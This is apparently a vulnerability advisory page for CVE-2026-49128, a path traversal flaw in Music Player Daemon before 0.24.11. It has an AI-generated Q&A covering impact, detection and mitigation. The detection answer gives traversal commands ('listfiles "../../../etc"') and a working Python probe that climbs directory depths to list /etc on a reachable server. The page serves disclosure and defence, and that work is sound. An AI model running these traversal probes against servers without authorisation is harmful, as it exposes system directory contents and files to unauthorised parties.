CVE-2026-49128
Path Traversal in Music Player Daemon Local Storage Plugin
Publication date: 2026-05-28
Last updated on: 2026-05-28
Assigner: VulnCheck
Description
CVSS Scores
EPSS Scores
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| music_player_daemon | mpd | < 0.24.11 (all releases before 0.24.11) |
| musicplayerdaemon | mpd | < 0.24.11 (all releases before 0.24.11) |
| musicplayerdaemon | mpd | * (unbounded match, all versions) |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-22 | The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory. |
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2026-49128 is a path traversal vulnerability in Music Player Daemon (MPD) versions before 0.24.11, specifically in the LocalStorage plugin's functions LocalStorage::MapFSOrThrow and LocalStorage::MapUTF8.
The vulnerability arises because the software constructs filesystem paths by directly concatenating a user-supplied URI with the storage root without proper canonicalization. This allows path traversal sequences like ".." to escape the intended directory.
An unauthenticated attacker can exploit this flaw using the listfiles command to enumerate names, sizes, and modification times of arbitrary directories readable by the MPD process, and the albumart command to read specific image files (such as cover.png, cover.jpg, cover.jxl, cover.webp) from directories outside the configured music directory.
How can this vulnerability impact me?
This vulnerability allows an unauthenticated attacker to perform unauthorized directory enumeration and limited file disclosure on the system where MPD is running.
Specifically, the attacker can use the listfiles command to reveal directory contents, including file names, sizes, and modification times, of any directories that the MPD process has read access to. This could include sensitive system directories like /etc, /usr, /var, or user home directories.
Additionally, the attacker can use the albumart command to read certain image files outside the intended music directory, potentially exposing files named cover.png, cover.jpg, cover.jxl, or cover.webp, or files accessible via manipulated symlinks.
Overall, this can lead to unauthorized information disclosure and potential privacy or security risks depending on the files accessible by the MPD process.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by sending crafted commands to the MPD control protocol, which listens on TCP port 6600 by default and, in a default configuration, accepts commands without authentication. The probe checks whether a relative URI containing `..` is honoured when the server maps it to a filesystem path:
- Send the `listfiles` command with a traversal URI (e.g. `listfiles ".."` or `listfiles "../../../etc"`). The number of `..` segments needed to reach a given target depends on how deep the configured `music_directory` sits in the filesystem, so try several depths rather than a single fixed path.
- Send the `albumart` command with a traversal URI to attempt reading an image such as `cover.png` or `cover.jpg` from a directory outside the configured music directory.
If `listfiles` returns `file:` / `directory:` entries (followed by `OK`) for a location outside the music directory, or `albumart` returns a `binary:` payload from such a location, the server is vulnerable. A patched server rejects the unsafe URI, which appears on the wire as an `ACK ...` error line rather than a listing.
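The following Python probe is an added example written for this page, not code from the MPD project or from this advisory. It speaks the MPD text protocol directly (greeting line, one command per line, reply terminated by `OK` or by an `ACK [...] {command} message` line), tries `listfiles` at several traversal depths because a client cannot know how deep `music_directory` is, and classifies each reply. The target directory `etc`, the host/port defaults, and the sample replies used in the comments are constructed assumptions; run it only against servers you are authorised to test.

```python
"""Probe an MPD server for the listfiles path-traversal described in CVE-2026-49128.

Added example for this advisory page (not MPD project code). The MPD protocol
framing below is MPD's documented behaviour; the probe target, defaults and
sample replies are assumptions constructed for illustration.
"""
import socket
from typing import Dict, List, Optional, Tuple


def mpd_quote(arg: str) -> str:
    """Quote one MPD command argument: double quotes, backslash-escaped quotes and backslashes."""
    return '"' + arg.replace("\\", "\\\\").replace('"', '\\"') + '"'


def traversal_candidates(target: str = "etc", max_depth: int = 8) -> List[str]:
    """Relative URIs that climb out of music_directory; its depth is unknown, so try 1..max_depth."""
    return ["../" * depth + target for depth in range(1, max_depth + 1)]


def parse_response(raw: str) -> Tuple[bool, Optional[str], List[Tuple[str, str]]]:
    """Split a text-only MPD reply into (succeeded, ack_line, key/value pairs).

    A reply is 'key: value' lines ended by 'OK' on success, or a single
    'ACK [err@cmd] {command} message' line on error.
    """
    pairs: List[Tuple[str, str]] = []
    for line in raw.splitlines():
        if line == "OK":
            return True, None, pairs
        if line.startswith("ACK "):
            return False, line, pairs
        key, sep, value = line.partition(": ")
        if sep:
            pairs.append((key, value))
    return False, "incomplete reply (no OK/ACK terminator)", pairs


def classify_listfiles(raw: str) -> str:
    """Classify a listfiles reply to a traversal URI.

    'vulnerable': the server listed file/directory entries for the escaped path
    'rejected'  : the server answered with ACK (patched, or path does not exist)
    'empty'     : succeeded but listed nothing (inconclusive; try another target)
    """
    ok, ack, pairs = parse_response(raw)
    if not ok:
        return "rejected" if ack and ack.startswith("ACK ") else "unknown"
    names = [v for k, v in pairs if k in ("file", "directory")]
    return "vulnerable" if names else "empty"


def read_reply(sock: socket.socket) -> str:
    """Read until a line that is exactly 'OK' or starts with 'ACK ' terminates the reply."""
    buf = b""
    while True:
        chunk = sock.recv(4096)
        if not chunk:
            raise ConnectionError("server closed connection mid-reply")
        buf += chunk
        if not buf.endswith(b"\n"):
            continue
        last = buf.decode("utf-8", "replace").splitlines()[-1]
        if last == "OK" or last.startswith("ACK "):
            return buf.decode("utf-8", "replace")


def probe(host: str = "127.0.0.1", port: int = 6600, timeout: float = 5.0) -> Dict[str, str]:
    """Connect, record the greeting, and send listfiles at increasing traversal depths."""
    results: Dict[str, str] = {}
    with socket.create_connection((host, port), timeout=timeout) as sock:
        greeting = b""
        while not greeting.endswith(b"\n"):  # greeting is "OK MPD <protocol version>\n"
            greeting += sock.recv(64)
        results["greeting"] = greeting.decode("utf-8", "replace").strip()
        for uri in traversal_candidates():
            sock.sendall(("listfiles " + mpd_quote(uri) + "\n").encode())
            verdict = classify_listfiles(read_reply(sock))
            results[uri] = verdict
            if verdict == "vulnerable":
                break  # one successful escape is enough to confirm the flaw
    return results


if __name__ == "__main__":
    # Constructed sample replies (not captured from a real server) to show the classifier:
    # a vulnerable server lists /etc, a patched one answers with an ACK error line.
    print(classify_listfiles("file: passwd\nsize: 2364\nLast-Modified: 2026-01-01T00:00:00Z\nOK\n"))
    print(classify_listfiles("ACK [2@0] {listfiles} bad URI\n"))
    for uri, verdict in probe().items():  # assumes an MPD instance on 127.0.0.1:6600
        print(uri, verdict)
```

The greeting reports MPD's protocol version, not the patch release, so it cannot by itself distinguish 0.24.10 from 0.24.11; the verdict comes from the `listfiles` replies. Because MPD treats a non-existent path as an error too, an `ACK` at every depth is only conclusive once the traversal target (here `etc`) is one that certainly exists on the host.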
What immediate steps should I take to mitigate this vulnerability?
The immediate mitigation is to upgrade Music Player Daemon (MPD) to version 0.24.11 or later, where the fix adds validation that rejects unsafe relative URIs before they are mapped to filesystem paths.
Until the upgrade can be applied, restrict network access to the MPD port (default TCP 6600) to trusted clients only, so that unauthenticated attackers cannot reach the command interface. MPD's own `bind_to_address` setting in mpd.conf (for example, binding to 127.0.0.1 or to a Unix socket) is the simplest way to do this on a single-user host; a host firewall rule covers the remote case.
Additionally, review and tighten filesystem permissions for the MPD process (run it as a dedicated, unprivileged user) so that it can read only the music directory and what it needs to operate, reducing what a successful traversal can enumerate or disclose.